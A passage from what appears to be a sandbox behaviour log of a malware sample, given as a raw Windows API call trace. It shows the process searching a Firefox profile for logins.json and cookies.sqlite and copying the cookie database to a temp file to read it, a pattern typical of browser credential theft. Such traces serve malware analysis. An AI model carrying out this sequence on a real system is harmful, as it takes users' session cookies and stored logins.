AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.216] GetProcessHeap () returned 0x8e0000 [0160.216] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924e60 | out: hHeap=0x8e0000) returned 1 [0160.216] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df778 | out: lpFindFileData=0x2df778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb5ad4bf0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb5ad4bf0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x83256a10, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="cookies.sqlite", cAlternateFileName="COOKIE~1.SQL")) returned 1 [0160.216] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.216] lstrlenW (lpString="\\") returned 1 [0160.216] GetProcessHeap () returned 0x8e0000 [0160.216] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x924da0 [0160.216] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.216] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.216] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0160.216] lstrlenW (lpString="cookies.sqlite") returned 14 [0160.216] GetProcessHeap () returned 0x8e0000 [0160.216] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xce) returned 0x8fce90 [0160.216] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.216] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="cookies.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite" [0160.216] VirtualQuery (in: lpAddress=0x924da0, lpBuffer=0x2df720, dwLength=0x1c | out: lpBuffer=0x2df720*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.217] GetProcessHeap () returned 0x8e0000 [0160.217] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924da0 | out: hHeap=0x8e0000) returned 1 [0160.217] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite", lpSrch="logins.json") returned 0x0 [0160.217] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite", lpSrch="cookies.sqlite") returned="cookies.sqlite" [0160.217] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite") returned 102 [0160.217] RtlComputeCrc32 (PartialCrc=0x0, Buffer=0x8fce90, Length=0xcc) returned 0x856f9ece [0160.218] GetProcessHeap () returned 0x8e0000 [0160.218] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x8) returned 0x8fbfc8 [0160.218] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cookies.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0160.219] CloseHandle (hObject=0x154) returned 1 [0160.219] GetProcessHeap () returned 0x8e0000 [0160.219] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x924da0 [0160.219] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x924da0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0160.219] GetTempFileNameW (in: lpPathName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", lpPrefixString=0x0, uUnique=0x0, lpTempFileName=0x924da0 | out: lpTempFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\646D.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\646d.tmp")) returned 0x646d [0160.220] DeleteFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\646D.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\646d.tmp")) returned 1 [0160.221] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cookies.sqlite"), lpNewFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\646D.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\646d.tmp"), bFailIfExists=0) returned 1 [0160.340] HeapCreate (flOptions=0x0, dwInitialSize=0xbd0000, dwMaximumSize=0x0) returned 0x2dc0000 [0160.402] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xa) returned 0x39297d0 [0160.402] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x39297d0) returned 0xa [0160.402] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x39297d0) returned 0xa [0160.402] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x39297d0 | out: hHeap=0x2dc0000) returned 1 [0160.402] GetSystemInfo (in: lpSystemInfo=0xd0fdc | out: lpSystemInfo=0xd0fdc*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0160.414] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x28) returned 0x39297d0 [0160.414] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x39297d0) returned 0x28 [0160.462] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xb5) returned 0x3929800 [0160.462] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929800) returned 0xb5 [0160.463] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929800) returned 0xb5 [0160.469] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x1d8) returned 0x39298c0 [0160.469] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x39298c0) returned 0x1d8 [0160.475] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x43) returned 0x3929aa0 [0160.475] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929aa0) returned 0x43 [0160.475] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x3929af0 [0160.475] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929af0) returned 0x10 [0160.475] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x43) returned 0x3929b08 [0160.475] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929b08) returned 0x43 [0160.475] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x3929b58 [0160.475] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929b58) returned 0x10 [0160.475] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x42) returned 0x3929b70 [0160.475] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929b70) returned 0x42 [0160.475] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x3929bc0 [0160.475] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929bc0) returned 0x10 [0160.475] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x2f) returned 0x3929bd8 [0160.475] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929bd8) returned 0x2f [0160.482] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x30) returned 0x3929c10 [0160.482] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929c10) returned 0x30 [0160.482] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x54) returned 0x3929c48 [0160.482] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929c48) returned 0x54 [0160.490] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x822) returned 0x3929ca8 [0160.490] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929ca8) returned 0x822 [0160.496] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x3929bd8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0160.496] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x5c) returned 0x392a4d8 [0160.496] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a4d8) returned 0x5c [0160.496] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x3929bd8, cbMultiByte=-1, lpWideCharStr=0x392a4d8, cchWideChar=46 | out: lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\646D.tmp") returned 46 [0160.496] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\646D.tmp", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2e [0160.496] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x62) returned 0x392a540 [0160.496] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a540) returned 0x62 [0160.496] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\646D.tmp", nBufferLength=0x31, lpBuffer=0x392a540, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\646D.tmp", lpFilePart=0x0) returned 0x2d [0160.496] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a4d8) returned 0x5c [0160.496] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a4d8 | out: hHeap=0x2dc0000) returned 1 [0160.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\646D.tmp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0160.496] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x2e) returned 0x392a4d8 [0160.496] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a4d8) returned 0x2e [0160.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\646D.tmp", cchWideChar=-1, lpMultiByteStr=0x392a4d8, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\646D.tmp", lpUsedDefaultChar=0x0) returned 46 [0160.496] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a540) returned 0x62 [0160.496] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a540 | out: hHeap=0x2dc0000) returned 1 [0160.496] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a4d8) returned 0x2e [0160.496] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a4d8 | out: hHeap=0x2dc0000) returned 1 [0160.496] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x281) returned 0x392a4d8 [0160.496] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a4d8) returned 0x281 [0160.519] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929ca8) returned 0x822 [0160.519] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929ca8 | out: hHeap=0x2dc0000) returned 1 [0160.519] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a6c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0160.519] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x5c) returned 0x3929ca8 [0160.519] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929ca8) returned 0x5c [0160.519] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a6c0, cbMultiByte=-1, lpWideCharStr=0x3929ca8, cchWideChar=46 | out: lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\646D.tmp") returned 46 [0160.519] GetFileAttributesExW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\646D.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\646d.tmp"), fInfoLevelId=0x0, lpFileInformation=0x2df52c | out: lpFileInformation=0x2df52c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2c56710, ftCreationTime.dwHighDateTime=0x1d59514, ftLastAccessTime.dwLowDateTime=0xe2c7c870, ftLastAccessTime.dwHighDateTime=0x1d59514, ftLastWriteTime.dwLowDateTime=0x83256a10, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0160.519] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\646D.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\646d.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0160.519] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929ca8) returned 0x5c [0160.520] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929ca8 | out: hHeap=0x2dc0000) returned 1 [0160.526] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x1000) returned 0x392a768 [0160.526] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a768) returned 0x1000 [0160.526] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a768) returned 0x1000 [0160.526] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x74) returned 0x3929ca8 [0160.526] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929ca8) returned 0x74 [0160.526] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x400) returned 0x3929d28 [0160.526] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929d28) returned 0x400 [0160.526] ReadFile (in: hFile=0x160, lpBuffer=0x2df64c, nNumberOfBytesToRead=0x64, lpNumberOfBytesRead=0x2df5f4, lpOverlapped=0x2df5d4 | out: lpBuffer=0x2df64c*, lpNumberOfBytesRead=0x2df5f4*=0x64, lpOverlapped=0x2df5d4) returned 1 [0160.536] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x8000) returned 0x392b770 [0160.536] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392b770) returned 0x8000 [0160.536] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392b770) returned 0x8000 [0160.536] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x74) returned 0x392a130 [0160.536] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a130) returned 0x74 [0160.536] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x400) returned 0x3933778 [0160.536] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3933778) returned 0x400 [0160.536] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929d28) returned 0x400 [0160.536] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929d28 | out: hHeap=0x2dc0000) returned 1 [0160.536] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929ca8) returned 0x74 [0160.536] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929ca8 | out: hHeap=0x2dc0000) returned 1 [0160.536] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a768) returned 0x1000 [0160.536] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a768) returned 0x1000 [0160.536] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a768 | out: hHeap=0x2dc0000) returned 1 [0160.634] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x54) returned 0x392a1b0 [0160.634] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a1b0) returned 0x54 [0160.634] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x54) returned 0x392a210 [0160.634] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a210) returned 0x54 [0160.634] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x22) returned 0x392a270 [0160.634] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a270) returned 0x22 [0160.634] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a2a0 [0160.634] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a2a0) returned 0x10 [0160.640] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x1d4c0) returned 0x3933b80 [0160.641] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3933b80) returned 0x1d4c0 [0160.641] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3933b80) returned 0x1d4c0 [0160.643] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929bd8) returned 0x2f [0160.643] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929bd8 | out: hHeap=0x2dc0000) returned 1 [0160.643] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929800) returned 0xb5 [0160.643] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929800 | out: hHeap=0x2dc0000) returned 1 [0160.643] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x39297d0) returned 0x28 [0160.643] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x39297d0 | out: hHeap=0x2dc0000) returned 1 [0160.664] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe) returned 0x3929bd8 [0160.664] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929bd8) returned 0xe [0160.664] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x50) returned 0x39297d0 [0160.664] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x39297d0) returned 0x50 [0160.664] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xa) returned 0x3929bf0 [0160.664] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929bf0) returned 0xa [0160.664] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x80) returned 0x3929828 [0160.664] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929828) returned 0x80 [0160.664] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xa) returned 0x392a2b8 [0160.664] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a2b8) returned 0xa [0160.664] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe) returned 0x392a2d0 [0160.664] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a2d0) returned 0xe [0160.664] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xd) returned 0x392a2e8 [0160.664] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a2e8) returned 0xd [0160.664] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x9) returned 0x392a300 [0160.664] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a300) returned 0x9 [0160.670] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a318 [0160.670] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a318) returned 0x10 [0160.678] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe0) returned 0x392a330 [0160.678] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a330) returned 0xe0 [0160.684] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x3fc) returned 0x3929ca8 [0160.684] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929ca8) returned 0x3fc [0160.684] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929ca8) returned 0x3fc [0160.692] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929ca8) returned 0x3fc [0160.692] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929ca8 | out: hHeap=0x2dc0000) returned 1 [0160.692] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a330) returned 0xe0 [0160.692] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a330 | out: hHeap=0x2dc0000) returned 1 [0160.692] LockFileEx (in: hFile=0x160, dwFlags=0x3, dwReserved=0x0, nNumberOfBytesToLockLow=0x1, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x2debe0 | out: lpOverlapped=0x2debe0) returned 1 [0160.692] LockFileEx (in: hFile=0x160, dwFlags=0x1, dwReserved=0x0, nNumberOfBytesToLockLow=0x1fe, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x2debd4 | out: lpOverlapped=0x2debd4) returned 1 [0160.692] UnlockFileEx (in: hFile=0x160, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x2debe4 | out: lpOverlapped=0x2debe4) returned 1 [0160.692] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a6ef, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0160.692] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x6c) returned 0x392a330 [0160.692] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a330) returned 0x6c [0160.692] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a6ef, cbMultiByte=-1, lpWideCharStr=0x392a330, cchWideChar=54 | out: lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\646D.tmp-journal") returned 54 [0160.692] GetFileAttributesExW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\646D.tmp-journal" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\646d.tmp-journal"), fInfoLevelId=0x0, lpFileInformation=0x2debe4 | out: lpFileInformation=0x2debe4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0160.693] GetLastError () returned 0x2 [0160.693] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a330) returned 0x6c [0160.693] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a330 | out: hHeap=0x2dc0000) returned 1 [0160.693] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a725, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0160.693] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x64) returned 0x392a330 [0160.693] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a330) returned 0x64 [0160.693] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a725, cbMultiByte=-1, lpWideCharStr=0x392a330, cchWideChar=50 | out: lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\646D.tmp-wal") returned 50 [0160.693] GetFileAttributesExW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\646D.tmp-wal" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\646d.tmp-wal"), fInfoLevelId=0x0, lpFileInformation=0x2debf4 | out: lpFileInformation=0x2debf4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0160.693] GetLastError () returned 0x2 [0160.693] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a330) returned 0x64 [0160.693] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a330 